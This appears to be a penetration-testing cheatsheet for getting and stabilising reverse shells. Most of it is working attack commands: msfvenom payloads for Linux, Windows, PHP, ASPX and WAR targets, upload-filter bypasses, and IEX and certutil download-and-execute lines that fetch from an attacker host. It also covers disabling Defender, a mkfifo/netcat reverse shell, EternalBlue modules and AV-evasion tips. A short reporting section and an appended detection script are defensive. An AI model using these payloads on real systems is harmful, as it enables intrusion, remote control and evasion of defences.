🛡️ Methodology Checklist
- Choose shell type based on available vector and OS
- Linux reverse: bash, python, perl, ruby options
- Windows reverse: PowerShell, msfvenom EXE, Nishang
- Web shells: PHP, ASPX, JSP based on server tech
- Start listener before delivery
- Stabilise shell immediately after catch
- Move to Meterpreter for advanced capability when possible
🎯 Operational Context
Use when: you need a working reverse shell one-liner fast; cross-reference by the interpreter available on the target.
Think Dumber First: Check what's on the target first: `which python python3 perl ruby php nc bash`. Match the one-liner to what's installed. Don't spend 20 minutes debugging a Python reverse shell if nc is available.
Skip when: N/A (quick reference document).
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `ping [TARGET_IP]` | OS fingerprint via TTL (128=Windows, 64=Linux) |
| `sudo nmap -v -O -sC -sV [TARGET_IP]` | Full OS + service detection scan |
| `use auxiliary/scanner/smb/smb_ms17_010` | Scan for EternalBlue |
| `msfvenom -l payloads` | List all MSFvenom payloads |
| `msfvenom -p linux/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f elf > shell.elf` | Linux ELF stageless reverse shell |
| `msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f exe > shell.exe` | Windows EXE stageless reverse shell |
| `msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -e x86/shikata_ga_nai -i 10 -f exe > enc.exe` | Encoded Windows reverse shell |
| `msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f aspx -o shell.aspx` | ASPX reverse shell (IIS) |
| `msfvenom -p php/reverse_php LHOST=[LHOST] LPORT=[LPORT] -f raw > shell.php` | PHP reverse shell |
| `echo 'GIF89a;' > shell.php && msfvenom -p php/reverse_php LHOST=[LHOST] LPORT=[LPORT] -f raw >> shell.php` | PHP + GIF magic bytes bypass |
| `msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war -o shell.war` | WAR file reverse shell (Tomcat) |
| `sudo python3 -m http.server 80` | Host payloads for delivery |
| `IEX(New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1')` | Fileless PS payload delivery |
| `wget "http://[LHOST]/shell.ps1" -OutFile "shell.ps1"; .\shell.ps1` | Download + execute PS script |
| `certutil.exe -urlcache -split -f "http://[LHOST]/shell.ps1" C:\Windows\Temp\shell.ps1` | LOLBAS delivery (Certutil) |
| `Set-MpPreference -DisableRealtimeMonitoring $true` | Disable Defender (lab only) |
| `sudo nc -lvnp [LPORT]` | Catch incoming reverse shell |
| `nc -nv [TARGET_IP] [PORT]` | Connect to bind shell |
| `rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/bash -i 2>&1 \| nc -lvnp [LPORT] > /tmp/f` | Linux bind shell one-liner |
| `use exploit/windows/smb/psexec` | MSF PsExec (requires admin creds) |
| `use exploit/windows/smb/ms17_010_psexec` | MSF EternalBlue exploit |
| `curl -X POST -F "file=@shell.aspx;type=image/png" http://[DOMAIN]/upload.php` | MIME type spoofing upload |
| `python3 -c 'import pty; pty.spawn("/bin/bash")'` | Step 1: PTY spawn (stabilization) |
| `stty raw -echo; fg` | Step 2: Fix terminal + foreground (local) |
| `reset; export TERM=xterm` | Step 3: Final terminal polish |
| `stty rows [ROWS] cols [COLS]` | Fix terminal dimensions |
| `perl -e 'exec "/bin/sh";'` | Perl interactive shell breakout |
| `ruby -e 'exec "/bin/sh"'` | Ruby interactive shell breakout |
| `awk 'BEGIN {system("/bin/sh")}'` | AWK interactive shell breakout |
| `find . -exec /bin/sh \; -quit` | find binary breakout |
| `vim -c ':!/bin/sh'` | vim breakout |
| `sudo -l` | Check sudo privileges (post-stabilization) |
🔬 Deep Dive & Workflow
Payload Decision Tree
```
Target is Windows?
├── IIS running? → ASPX payload (msfvenom -f aspx)
├── Can deliver EXE? → msfvenom -f exe
├── PS accessible? → Nishang IEX delivery (fileless)
└── Authenticated SMB? → MSF psexec
Target is Linux?
├── Web app with file upload? → PHP web shell
├── Can run binary? → msfvenom -f elf
├── Bash accessible? → mkfifo nc reverse shell
└── MSF module exists? → use exploit/linux/http/...
```
Shell Stabilization Quick Reference
```
python3 -c 'import pty; pty.spawn("/bin/bash")'
[Ctrl+Z]
stty raw -echo; fg
reset
export TERM=xterm
```
AV Evasion Priority
- Fileless (IEX): best; never touches disk
- Encoding (Shikata Ga Nai): bypasses static scan
- Custom payloads: modify shellcode, avoid known signatures
- LOLBAS delivery: certutil/BITSAdmin for download stage
Key Ports for Reverse Shells
| Port | Reason |
|---|---|
| 443 | HTTPS, almost never blocked |
| 80 | HTTP, usually allowed |
| 53 | DNS, critical infra, rarely filtered |
| 4444 | MSF default, avoid in real engagements |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Bash one-liner fails | bash is not located at /bin/bash | Try /bin/sh instead; locate with `which bash sh` |
| Python reverse shell gets no TTY | No pty module | Add: import pty; pty.spawn('/bin/bash') after connection established |
| PHP shell not executing | PHP disabled or wrong syntax | Test: php -r 'echo "ok";'; use shell_exec() if exec() disabled |
| PowerShell one-liner too long | Character limit in injection | Base64 encode: powershell -enc [BASE64]; use msfvenom to generate proper encoded payload |
| nc -e not available | BSD netcat installed | Use mkfifo: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|bash -i 2>&1\|nc [LHOST] [LPORT] >/tmp/f` |
📋 Reporting Trigger
Finding Title: Interactive Shell Obtained via Reverse Shell One-Liner
Impact: Language interpreter-based reverse shells leverage trusted system binaries to establish a C2 channel, achieving interactive RCE without requiring file upload or binary execution.
Root Cause: Interpreter (Python, PHP, Perl) available on the target system with outbound network access and no restriction on socket creation.
Recommendation: Restrict interpreter access for service accounts. Implement egress filtering. Monitor for interpreter processes establishing outbound TCP connections. Apply AppArmor/SELinux profiles.
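As an added example (not part of the original cheatsheet), the monitoring control the recommendation describes, run over constructed connect-audit events: interpreters from the cheatsheet's own list that open outbound TCP connections are flagged, loopback traffic is ignored, and a non-RFC1918 destination or the MSF default port 4444 is rated higher. The event format and sample values are assumptions for illustration.

```python
import ipaddress
import re

# Interpreters and utilities from the cheatsheet that a service account
# should rarely use to open outbound TCP connections.
INTERPRETERS = {"python", "python3", "perl", "ruby", "php", "nc", "bash", "sh", "awk"}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample events (not real logs) in an assumed connect-audit
# format: "<epoch> uid=<uid> comm=<process> dst=<ip>:<port>".
SAMPLE_EVENTS = """\
1700000000 uid=33 comm=python3 dst=203.0.113.10:4444
1700000001 uid=33 comm=nginx dst=10.0.0.5:443
1700000002 uid=1000 comm=curl dst=198.51.100.7:443
1700000003 uid=33 comm=php dst=127.0.0.1:3306
1700000004 uid=33 comm=perl dst=10.0.0.20:443
1700000005 uid=0 comm=bash dst=203.0.113.10:53
""".splitlines()
EVENT_RE = re.compile(r"^(\d+) uid=(\d+) comm=(\S+) dst=([0-9.]+):(\d+)$")

def parse_event(line):
    """Return (uid, comm, ip, port) for a well-formed line, or None for noise."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    _ts, uid, comm, ip, port = m.groups()
    return int(uid), comm, ip, int(port)

def classify(comm, ip, port):
    """Rate one outbound connect: None (ignore), 'medium' or 'high'."""
    if comm not in INTERPRETERS:
        return None
    dst = ipaddress.ip_address(ip)
    if dst.is_loopback:
        return None  # e.g. PHP talking to a local database, not a callback
    # Non-RFC1918 destination or the MSF default port is the strongest signal.
    if port == 4444 or not any(dst in net for net in RFC1918):
        return "high"
    return "medium"  # internal host: possible pivot or legitimate admin use

def find_interpreter_callbacks(lines):
    """Return [(severity, comm, uid, 'ip:port'), ...] for flagged events."""
    hits = []
    for ev in filter(None, map(parse_event, lines)):
        uid, comm, ip, port = ev
        sev = classify(comm, ip, port)
        if sev:
            hits.append((sev, comm, uid, f"{ip}:{port}"))
    return hits
```

Feeding it `SAMPLE_EVENTS` flags the python3 and bash callbacks to the external host as high and the perl connection to an internal host as medium, while nginx, curl and the loopback PHP connection are ignored.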